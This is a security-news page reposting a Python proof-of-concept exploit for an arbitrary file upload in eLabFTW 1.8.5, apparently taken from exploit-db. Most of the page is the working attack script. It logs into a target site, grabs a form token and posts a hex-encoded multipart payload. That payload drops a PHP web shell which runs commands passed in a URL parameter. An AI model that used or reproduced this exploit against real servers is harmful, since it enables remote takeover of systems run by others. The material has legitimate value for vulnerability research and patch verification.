Exploit/Advisories

Published on May 21st, 2019 📆 | 6513 Views ⚑

0

eLabFTW 1.8.5 – Arbitrary File Upload / Remote Code Execution


TTS

#!/usr/bin/env python
#
# Exploit Title         : eLabFTW 1.8.5 'EntityController' Arbitrary
File Upload / RCE
# Date                  : 5/18/19
# Exploit Author        : liquidsky (JMcPeters)
# Vulnerable Software   : eLabFTW 1.8.5
# Vendor Homepage       : https://www.elabftw.net/
# Version               : 1.8.5
# Software Link         : https://github.com/elabftw/elabftw
# Tested On             : Linux / PHP Version 7.0.33 / Default
installation (Softaculous)
# Author Site : http://incidentsecurity.com | https://github.com/fuzzlove
#
# Greetz : wetw0rk, offsec ^^
#
# Description: eLabFTW 1.8.5 is vulnerable to arbitrary file uploads
via the /app/controllers/EntityController.php component.
# This may result in remote command execution. An attacker can use a
user account to fully compromise the system using a POST request.
# This will allow for PHP files to be written to the web root, and for
code to execute on the remote server.
#
# Notes: Once this is done a php shell will drop at https://[target
site]/[elabftw directory]/uploads/[random 2 alphanum]/[random long
alphanumeric].php5?e=whoami
# You will have to visit the uploads directory on the site to see what
the name is. However there is no protection against directory listing.
# So this can be done by an attacker remotely.

import requests
from bs4 import BeautifulSoup as bs4
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
import sys
import time

print "+-------------------------------------------------------------+"
print
print "- eLabFTW 1.8.5 'EntityController' Arbitrary File Upload / RCE"
print
print "-          Discovery / PoC by liquidsky (JMcPeters) ^^"
print
print "+-------------------------------------------------------------+"

try:

target = sys.argv[1]
email = sys.argv[2]
password = sys.argv[3]
directory = sys.argv[4]

except IndexError:

        print
print "- Usage: %s    " % sys.argv[0]
print "- Example: %s incidentsecurity.com user@email.com mypassword
elabftw" % sys.argv[0]
        print
sys.exit()


proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}

# The payload to send
data = ""
data += "x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
data += "x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx37"
data += "x32x31x36x37x35x39x38x31x31x30x38x37x34x35x39"
data += "x34x31x31x31x36x33x30x33x39x35x30x37x37x0dx0a"
data += "x43x6fx6ex74x65x6ex74x2dx44x69x73x70x6fx73x69"
data += "x74x69x6fx6ex3ax20x66x6fx72x6dx2dx64x61x74x61"
data += "x3bx20x6ex61x6dx65x3dx22x75x70x6cx6fx61x64x22"
data += "x0dx0ax0dx0ax74x72x75x65x0dx0ax2dx2dx2dx2dx2d"
data += "x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
data += "x2dx2dx2dx2dx2dx2dx2dx2dx2dx37x32x31x36x37x35"
data += "x39x38x31x31x30x38x37x34x35x39x34x31x31x31x36"
data += "x33x30x33x39x35x30x37x37x0dx0ax43x6fx6ex74x65"
data += "x6ex74x2dx44x69x73x70x6fx73x69x74x69x6fx6ex3a"
data += "x20x66x6fx72x6dx2dx64x61x74x61x3bx20x6ex61x6d"
data += "x65x3dx22x69x64x22x0dx0ax0dx0ax34x0dx0ax2dx2d"
data += "x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
data += "x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx37x32x31"
data += "x36x37x35x39x38x31x31x30x38x37x34x35x39x34x31"
data += "x31x31x36x33x30x33x39x35x30x37x37x0dx0ax43x6f"
data += "x6ex74x65x6ex74x2dx44x69x73x70x6fx73x69x74x69"
data += "x6fx6ex3ax20x66x6fx72x6dx2dx64x61x74x61x3bx20"
data += "x6ex61x6dx65x3dx22x74x79x70x65x22x0dx0ax0dx0a"
data += "x65x78x70x65x72x69x6dx65x6ex74x73x0dx0ax2dx2d"
data += "x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
data += "x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx37x32x31"
data += "x36x37x35x39x38x31x31x30x38x37x34x35x39x34x31"
data += "x31x31x36x33x30x33x39x35x30x37x37x0dx0ax43x6f"
data += "x6ex74x65x6ex74x2dx44x69x73x70x6fx73x69x74x69"
data += "x6fx6ex3ax20x66x6fx72x6dx2dx64x61x74x61x3bx20"
data += "x6ex61x6dx65x3dx22x66x69x6cx65x22x3bx20x66x69"
data += "x6cx65x6ex61x6dx65x3dx22x70x6fx63x33x2ex70x68"
data += "x70x35x22x0dx0ax43x6fx6ex74x65x6ex74x2dx54x79"
data += "x70x65x3ax20x61x70x70x6cx69x63x61x74x69x6fx6e"
data += "x2fx78x2dx70x68x70x0dx0ax0dx0ax3cx3fx70x68x70"
data += "x20x65x63x68x6fx20x73x68x65x6cx6cx5fx65x78x65"
data += "x63x28x24x5fx47x45x54x5bx27x65x27x5dx2ex27x20"
data += "x32x3ex26x31x27x29x3bx20x3fx3ex0dx0ax2dx2dx2d"
data += "x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
data += "x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx37x32x31x36"
data += "x37x35x39x38x31x31x30x38x37x34x35x39x34x31x31"
data += "x31x36x33x30x33x39x35x30x37x37x2dx2dx0dx0a"

s = requests.Session()

print "[*] Visiting eLabFTW Site"
r = s.get('https://' + target + '/' + directory +
'/login.php',verify=False, proxies=proxies)
print "[x]"

# Grabbing token
html_bytes = r.text
soup = bs4(html_bytes, 'lxml')
token = soup.find('input', {'name':'formkey'})['value']

values = {'email': email,
          'password': password,
          'formkey': token,}

time.sleep(2)

print "[*] Logging in to eLabFTW"

r = s.post('https://' + target + '/' + directory +
'/app/controllers/LoginController.php', data=values, verify=False,
proxies=proxies)

print "[x] Logged in :)"

time.sleep(2)

sessionId = s.cookies['PHPSESSID']

headers = {
    #POST /elabftw/app/controllers/EntityController.php HTTP/1.1
    #Host: incidentsecurity.com
    "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:52.0)
Gecko/20100101 Firefox/52.0",
    "Accept": "application/json",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    #Referer: https://incidentsecurity.com
    "Cache-Control": "no-cache",
    "X-Requested-With": "XMLHttpRequest",
    "Content-Length": "588",
    "Content-Type": "multipart/form-data;
boundary=---------------------------72167598110874594111630395077",
    "Connection": "close",
    "Cookie": "PHPSESSID=" + sessionId + ";" + "token=" + token
}

print "[*] Sending payload..."
r = s.post('https://' + target + '/' + directory +
'/app/controllers/EntityController.php',verify=False, headers=headers,
data=data, proxies=proxies)
print "[x] Payload sent"
print
print "Now check https://%s/%s/uploads" % (target, directory)
print "Your php shell will be there under a random name (.php5)"
print
print "i.e https://[vulnerable
site]/elabftw/uploads/60/6054a32461de6294843b7f7ea9ea2a34a19ca420752b087c87011144fc83f90b9aa5bdcdce5dee132584f6da45b7ec9e3841405e9d67a7d196f064116cf2da38.php5?e=whoami"





https://www.exploit-db.com/exploits/46869

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑